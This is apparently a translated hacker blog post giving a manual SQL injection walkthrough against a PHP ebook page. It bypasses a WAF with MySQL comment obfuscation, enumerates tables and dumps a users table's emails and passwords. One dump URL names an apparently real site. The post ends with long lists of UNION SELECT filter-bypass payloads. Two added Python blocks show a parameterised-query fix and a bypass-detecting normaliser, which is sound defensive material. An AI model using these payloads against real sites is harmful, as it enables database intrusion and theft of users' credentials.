assalamualaikum
This time it is about how to bypass a WAF filter on a SQLi bug
manually; why manually? Because sqlmap is asleep :P
Okay, straight to it.
Target:
http://www.target.com/ebookcontents.php?id=95'
Yep, a SQLi bug.
Next, continue with the "order by" command to find the number of columns,
and keep going until you get it :D
Turns out there are 6 columns:
http://www.target.com/ebookcontents.php?id=95 order by 6--
Then find the magic number with the "union select" command:
http://www.target.com/ebookcontents.php?id=95 union select 1,2,3,4,5,6--
The result is Not Acceptable, so there is probably a WAF; let's try to bypass it:
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,3,4,5,6--
Hey, it opens after all; here I pick number 3 :D
Let's see which MySQL version it runs:
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,version(),4,5,6--
It runs version 5.5.34-cll.
Next, let's look at the contents of the database with this command:
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,group_concat(table_name)(0x3c62723e,table_name)*/,4,5,6 from information_schema.tables where table_schema=database()--
The result is Not Acceptable again; maybe the syntax needs to be more convoluted, so let's try it this way:
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(0x3c62723e,table_name)*/,4,5,6 +from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
And the result:
Heheh, it works; there is a lot in this "database", so let's focus on the "users" database.
Enter this command:
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(Group_Concat(table_name))*/,4,5,6 from information_schema.tables where table_schema=database()--
Hmm, lots of tables,
here I pick the "users" table:
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!column_name*/)),4,5,6 from /*!information_schema*/.columns where /*!table_name*/=0x7573657273--+
And the result: id, email, password, date.
Let's dump it :P
http://www.trnres.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!email,0x3a,password*/)),4,5,6/*!from*/ /*!users*/
And the result:
Bonus
Tips and tricks
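Everything in the walkthrough above works for one reason: the `id` value from the query string is spliced into the SQL text, so the WAF is the only thing standing between the URL and the parser. The following is an added example, not code from the original post or from the site it describes; it uses a constructed in-memory SQLite database and hypothetical function names (`make_db`, `lookup_concat`, `lookup_param`) to show the vulnerable string-built query beside its parameterised replacement, which makes the whole comment-obfuscation game irrelevant.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's database: a content table with a
    numeric id and a users table with the columns the post lists."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ebookcontents (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, date TEXT)")
    conn.executemany("INSERT INTO ebookcontents VALUES (?, ?)",
                     [(95, "Chapter 95"), (96, "Chapter 96")])
    conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                 (1, "admin@example.test", "hash-placeholder", "2014-01-01"))
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable 'before' half: the query-string value is pasted into the SQL
    text, so anything after the number is parsed as SQL. Same shape as the
    PHP page the post targets."""
    sql = f"SELECT id, title FROM ebookcontents WHERE id={user_id}"
    return conn.execute(sql).fetchall()


def lookup_param(conn, user_id):
    """Hardened 'after' half: the value is bound as a parameter, so the parser
    never sees it as SQL. A string that is not a number matches no id at all."""
    sql = "SELECT id, title FROM ebookcontents WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_param(db, "95"))                      # the legitimate lookup still works
    print(lookup_param(db, "-95 UNION SELECT email, password FROM users"))  # []
```

In PHP the equivalent is a PDO or mysqli prepared statement with the id bound as a parameter (and, for a numeric id, cast or validated as an integer first). A WAF in front of a concatenated query is a bet that the blacklist is complete; the list of bypasses further down the post is the record of how that bet is lost.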
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3--
6. id=1+UnIoN+SeLecT 1,2,3--
7. id=1+UnIOn/**/SeLect 1,2,3--
8. id=1+UNIunionON+SELselectECT 1,2,3--
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3--
10. id=1 and (select 1)=(Select 0xAA 1000 more A's)+UnIoN+SeLeCT 1,2,3--
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3--
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--
And
UNION SELECT bypassing:
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
id=1+'UnI''On'+'SeL''ECT' <- MySQL only
id=1+'UnI'||'on'+SeLeCT' <- MSSQL only
after the id number, e.g. id=1 +/*!and*/+1=0
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
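Nearly every entry in the two lists above beats the filter by exploiting a gap between what the WAF inspects and what MySQL actually parses: `/*!...*/` version comments whose body executes, `#` and `--` comments that swallow the rest of the line, URL encoding applied once or twice, and filters that delete a keyword and pass the remainder on (`UNIunionON`). From the defender's side the lesson is that a filter must normalise input the way the parser will, and must never transform input and forward it. The block below is an added example, not code from the original post; the function names (`normalize`, `detect`, `strip_keywords`) and the test inputs are constructed, and the parsing rules are a deliberately simplified model of MySQL's comment handling.

```python
import re
from urllib.parse import unquote_plus

# Comment forms the payloads rely on. MySQL executes the body of /*!...*/ and
# /*!NNNNN...*/ version comments, so the normaliser keeps that body and drops
# only the delimiters; ordinary /*...*/ comments and '#' / '-- ' line comments
# are whitespace to the parser.
_VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.DOTALL)
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
_LINE_COMMENT = re.compile(r"(?:#|--(?:\s|$))[^\r\n]*")
_UNION_SELECT = re.compile(
    r"\bunion\b(?:\s+(?:all|distinctrow|distinct))?\s+select\b")


def normalize(raw, max_decode_rounds=3):
    """Reduce a query-string value to roughly what the MySQL parser sees."""
    value = raw
    # Decode until the value stops changing, so double encoding
    # (%2555 -> %55 -> U) is unwrapped too; '+' becomes a space.
    for _ in range(max_decode_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = _VERSION_COMMENT.sub(r" \1 ", value)   # keep the executable body
    value = _BLOCK_COMMENT.sub(" ", value)         # plain comments are whitespace
    value = _LINE_COMMENT.sub(" ", value)          # '#' and '-- ' run to end of line
    return re.sub(r"\s+", " ", value).strip().lower()


def detect(raw):
    """True when the normalised value carries a UNION ... SELECT."""
    return bool(_UNION_SELECT.search(normalize(raw)))


def strip_keywords(raw):
    """The anti-pattern: delete blacklisted words and forward what is left.
    Deleting 'union' from 'UNIunionON' manufactures the keyword the filter
    was meant to remove; a filter that does this should reject instead."""
    return re.sub(r"union|select", "", raw, flags=re.IGNORECASE)


if __name__ == "__main__":
    for sample in ("95",
                   "-95 /*!union*/ /*!select*/ 1,2,3,4,5,6--",
                   "1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2,3",
                   "1+UNIunionON+SELselectECT 1,2,3"):
        print(repr(sample), "->", repr(normalize(sample)), detect(sample))
```

Two results are worth reading side by side: the raw `UNIunionON+SELselectECT` string is not flagged, because MySQL would not parse it as a UNION either, while the output of `strip_keywords` on the same string is flagged, because the deletion filter itself produced `UNION+SELECT`. Normalising to the parser's view and rejecting on a match is the defensible behaviour; rewriting and forwarding is not.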
Ok, hope this is useful.